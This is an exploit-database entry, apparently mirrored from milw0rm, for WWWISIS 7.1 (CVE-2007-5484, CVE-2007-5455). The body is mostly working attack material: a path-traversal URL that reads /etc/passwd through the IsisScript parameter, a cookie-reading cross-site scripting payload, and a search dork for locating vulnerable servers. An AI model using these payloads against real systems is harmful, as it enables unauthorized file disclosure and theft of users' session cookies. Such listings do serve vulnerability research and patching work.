[] NeoSense
E X P L O I T S
title author type platform port cve id

WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting

Author: JosS
type: webapps
platform: cgi
port: 
date_added: 2007-10-12 
date_updated: 2017-10-13 
verified: 1 
codes: OSVDB-40170;CVE-2007-5484;OSVDB-37999;CVE-2007-5455 
tags: 
aliases:  
screenshot_url:  
application_url: 
# WWWISIS (Search) Multiple Vulnerabilities
# Download:
# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2
# Bug found by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# d0rk: powered by WWWISIS
#Stop lammer


# Local File Disclosure Vulnerability:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd


# Exploit In (XSS):

http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e
....

[ i,e ... ] it is the language of script

# Cross Siting Scripting:

<script>alert(document.cookie)</script>


//---------------------------------------\\

Greetz To: All Hackers
JosS!

# milw0rm.com [2007-10-13]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.